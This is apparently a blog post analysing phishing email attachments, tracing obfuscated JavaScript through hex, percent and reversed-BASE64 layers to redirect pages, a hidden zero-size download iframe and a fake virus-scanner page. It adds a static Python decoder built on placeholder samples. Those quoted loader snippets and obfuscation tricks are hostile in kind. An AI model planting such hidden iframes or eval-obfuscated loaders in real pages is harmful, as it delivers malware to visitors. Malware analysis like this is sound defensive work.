You've got mail-ware!

Early Wednesday morning I received three nearly identical e-mails.  Each had the appearance of SPAM, but not your typical SPAM.  In place of the usual advertisement composed of bad spelling and poor grammar was a well-written message crafted to look like an invoice and accompanied by an HTML attachment.  Inspecting the contents of the attachments revealed that each contained identical JavaScript code, which was clearly malicious.  The JavaScript had an appearance similar to that of obfuscated shellcode, with a string of hex values being unescaped and written to the HTML document:

<script language="JavaScript" type="text/javascript">
var i,y,x="202020203c73[...snipped...]726970743e20";y='';for(i=0;i<x.length;i+=2){y+=unescape('%'+x.substr(i,2));}document.write(y);
</script>

Because the Thunderbird mail client, which I was using, does not execute JavaScript and the attachments contained nothing but JavaScript, they appeared inline with the message bodies as empty content.  Since the JavaScript hadn't executed on my system, I simply mentioned the messages to our network security people and went on with my day.  Eventually, though, I began to get curious about the purpose of the JavaScript.  So, later that evening I decided to investigate.  

First I wrote the following C++ code to decode the encoded string that appeared in the JavaScript:

#include <stdio.h>
#include <stdlib.h>
#include <string>
 
using namespace std;
 
int main()
{
  // The hex string copied out of the script's x variable (snipped here)
  string s = "202020203c73[...snipped...]726970743e20";
 
  // Each pair of hex digits is one character, exactly as the script's
  // unescape('%' + x.substr(i, 2)) produces it
  for (string::size_type i = 0; i + 1 < s.length(); i += 2)
    printf("%c", (int) strtoul(s.substr(i, 2).c_str(), NULL, 16));
  printf("\n");
 
  return 0;
}


This provided the following result:

<script src="http://[redacted].com/iframfile.js"></script>

Next I tried to view the content of the encoded URL using wget, but the URL had already been disabled.  The investigation had led to a dead end, but fortunately I received a similar message Thursday afternoon.  Attached to this message was an HTML file containing similar, but not identical, JavaScript code.  This time the JavaScript was embedded within a form e-mail from Amazon.com containing links to different Amazon.com support pages.  The embedded JavaScript looked like this:

<script language=JavaScript>document.write(unescape('%3Cme%74a h%[...snipped...]2le%3E%0D%0A'))</script>

This time I used the following Python code to decode the encoded string:

import urllib
# Python 2: urllib.unquote undoes the %xx encoding that JavaScript's unescape() reverses;
# on Python 3 the same function is urllib.parse.unquote
urllib.unquote('%3Cme%74a h%[...snipped...]2le%3E%0D%0A')

Which yielded the following HTML:

<meta http-equiv="refresh" content="0;url=http://[redacted].co.za/1.html" />\r\n<table width="100%" border="0"><tr bgcolor="#556688" align="center"><td><a href="http://www.pullsoft.com/htmlpower.htm"><font face="Arial, Helvetica, sans-serif" color="#FFFFFF" size="-1">This Web Page was protected by HTMLPower,  Click here to Register</font></a></td></tr></table>\r\n

Interestingly enough, this one contained an advertisement for an HTML obfuscation tool whose web page lists protecting addresses from spammers as one of its primary functions.  I again used wget to view the content of the URL, obtaining the following:

PLEASE WAITING.... 4 SECONDS

<meta http-equiv="refresh" content="4;url=http://[redacted].cz.cc/[removed] />

<iframe width="0" height="0" src="http://[redacted].co.cc/download/?[removed]"></iframe>

Accessing the iframe URL with wget provided:

--2010-09-23 20:40:07--  http://[redacted].co.cc/download/?[removed]
Resolving [redacted].co.cc... 188.65.73.10
Connecting to [redacted].co.cc|188.65.73.10|:80... connected.
HTTP request sent, awaiting response... 302 Moved Temporarily
Location: http://www.google.com/404/ [following]
--2010-09-23 20:40:07--  http://www.google.com/404/
Resolving www.google.com... 72.14.204.147, 72.14.204.99, 72.14.204.104, ...
Connecting to www.google.com|72.14.204.147|:80... connected.
HTTP request sent, awaiting response... 404 Not Found
2010-09-23 20:40:08 ERROR 404: Not Found.

Interesting that this one redirected to a non-existent page.  This URL was a dead end, but following the other URL provided a much more intriguing result.  It led to a "My Windows Virus Scanner" malware page with some interesting JavaScript code.  First was JavaScript to initiate a file download:

<script type="text/javascript">
<!--//<![CDATA[
var LinkSoftDown = "[removed]";
function ext(){window.open( "[removed]", "_blank", "toolbar=0,titlebar=0,scrollbars=0,status=0,location=0,menubar=0,width=100,height=100,left=0,top=0");}
if (window.attachEvent) eval("window.attachEvent('onunload',ext);");
else window.addEventListener("unload", ext, false);
//]]>-->
</script>

Second was some JavaScript containing a large block of BASE64 encoded data that was decoded and evaluated:

<script type="text/javascript" src="[removed]">
b6 = [A lot of BASE64 encoded data]
var s = BASE64.decode(b6); eval(s.split('').reverse().join(''));
</script>

What was interesting about this encoding was that the plain text had not just been BASE64 encoded, but had been completely reversed.  I used the following Python to reveal the contents of the encoded data:

import base64
# b6 holds the BASE64 string copied from the script; [::-1] undoes the reversal
# that the script performs with split('').reverse().join('')
base64.b64decode(b6)[::-1]
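
The three decoding steps above (the hex-pair unescape from the first attachment, the percent-encoded string from the Amazon-themed one, and the reversed BASE64 block from the fake scanner page) are the same small amount of work each time, so it is worth having a single script that pulls every <script> block out of an HTML attachment, decodes whichever layer it recognises, and lists the resulting URLs and tell-tale constructs without ever executing the JavaScript.  The Python below is an added example written for this post, not code from the original messages or from any tool mentioned here; the sample attachments, the example.invalid host names and the URL in the window.open() sample are all constructed for the demonstration.

```python
import base64
import re
import urllib.parse

# --- constructed samples (not the original attachments; placeholder hosts) ---
INNER_1 = '<script src="http://hex-stage.example.invalid/iframfile.js"></script>'
SAMPLE_HEX = (
    '<script language="JavaScript" type="text/javascript">'
    'var i,y,x="' + INNER_1.encode("latin-1").hex() + '";y=\'\';'
    "for(i=0;i<x.length;i+=2){y+=unescape('%'+x.substr(i,2));}document.write(y);"
    "</script>"
)
INNER_2 = '<meta http-equiv="refresh" content="0;url=http://pct-stage.example.invalid/1.html" />\r\n'
SAMPLE_PCT = ("<script language=JavaScript>document.write(unescape('"
              + urllib.parse.quote(INNER_2, safe="") + "'))</script>")
INNER_3 = ('document.write(\'<iframe width="0" height="0" '
           'src="http://b64-stage.example.invalid/download/"></iframe>\');')
SAMPLE_B64 = ('<script type="text/javascript">b6 = "'
              + base64.b64encode(INNER_3[::-1].encode("latin-1")).decode("ascii")
              + "\";var s = BASE64.decode(b6); eval(s.split('').reverse().join(''));</script>")
SAMPLE_UNLOAD = ('<script type="text/javascript">function ext(){window.open('
                 '"http://dl.example.invalid/setup.exe","_blank");}'
                 'if (window.attachEvent) eval("window.attachEvent(\'onunload\',ext);");'
                 ' else window.addEventListener("unload", ext, false);</script>')

SCRIPT_RE = re.compile(r"<script[^>]*>([\s\S]*?)</script>", re.I)
HEX_RE = re.compile(r'"([0-9a-fA-F]{16,})"')                 # x="2020203c..."
PCT_RE = re.compile(r"unescape\('([^']+)'\)")                 # unescape('%3Cme%74a...')
B64_RE = re.compile(r"""\b(?:var\s+)?(\w+)\s*=\s*["']([A-Za-z0-9+/=]{16,})["']""")
URL_RE = re.compile(r"https?://[^\s\"'<>()]+")


def decode_hex_pairs(hexstr):
    # unescape('%' + xx) yields the character with code xx, i.e. latin-1
    return bytes.fromhex(hexstr).decode("latin-1")


def decode_percent(s):
    # JavaScript unescape() and urllib's unquote agree on %xx sequences
    return urllib.parse.unquote(s)


def decode_reversed_base64(b64):
    # BASE64.decode(b6) followed by split('').reverse().join('')
    return base64.b64decode(b64).decode("latin-1")[::-1]


def decode_script(body):
    """Return (layer_name, decoded_text) pairs for every layer recognised in one script."""
    out = []
    for m in HEX_RE.finditer(body):
        if len(m.group(1)) % 2 == 0 and "unescape" in body:
            out.append(("hex-pairs", decode_hex_pairs(m.group(1))))
    for m in PCT_RE.finditer(body):
        if "%" in m.group(1):
            out.append(("percent", decode_percent(m.group(1))))
    for m in B64_RE.finditer(body):
        name, data = m.groups()
        if "BASE64.decode(" + name + ")" not in body:
            continue  # a quoted string that is not fed to the decoder (e.g. the hex one)
        try:
            text = base64.b64decode(data, validate=True).decode("latin-1")
        except ValueError:
            continue
        reversed_ = ".reverse()" in body
        out.append(("base64-reversed" if reversed_ else "base64",
                    text[::-1] if reversed_ else text))
    return out


def analyse_attachment(html):
    """Decode every script layer statically and collect URLs and suspicious constructs."""
    report = {"layers": [], "urls": set(), "flags": []}
    for script in SCRIPT_RE.findall(html):
        report["urls"].update(URL_RE.findall(script))
        for layer, text in decode_script(script):
            report["layers"].append(layer)
            report["urls"].update(URL_RE.findall(text))
            if re.search(r'http-equiv="refresh"', text, re.I):
                report["flags"].append("meta-refresh")
            if "<iframe" in text.lower():
                report["flags"].append("hidden-iframe")
        if re.search(r"onunload|\"unload\"", script):
            report["flags"].append("window.open-on-unload")
    report["urls"] = sorted(report["urls"])
    return report


if __name__ == "__main__":
    for name, sample in [("hex", SAMPLE_HEX), ("percent", SAMPLE_PCT),
                         ("base64", SAMPLE_B64), ("unload", SAMPLE_UNLOAD)]:
        print(name, analyse_attachment(sample))
```

Nothing in the attachment is evaluated: each layer is decoded with the pure inverse of the transformation the script would apply, and the decoded text is only searched for URLs, meta refreshes, zero-size iframes and the unload-triggered window.open() seen on the scanner page.  A real attachment can stack these layers (the hex-decoded script here loaded another script, which in turn used a percent-encoded meta refresh), so on real input you would feed each decoded text back through analyse_attachment until no new layer appears.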

What I received was more JavaScript to construct a fake virus scanner page.  I never actually executed this code to see what it produced, but I did download the executable (again with wget) referenced by the first JavaScript segment.  I used the UNIX strings command to see if it contained anything interesting.  It did not.  The only human readable string was the info tag from a GIF image, indicating that the image was in the public domain.  Any other text must have been encoded.  

That was as far as I took my little investigation into the messages.  It was the first time I had ever seen this type of obfuscated JavaScript embedded within an e-mail message, and I found it to be a fairly clever attempt at bypassing e-mail filters.  I received one final message of this nature this morning.  This one was quite the disappointment, as it didn't even bother to obfuscate the HTTP redirect, simply placing the raw text of the meta tag in the attachment.  It was followed by a note from the network security people saying that virus definitions for this particular item had been released, so these messages would no longer be making it past the mail server's virus scanner and I probably shouldn't be seeing any more of them in the future.  
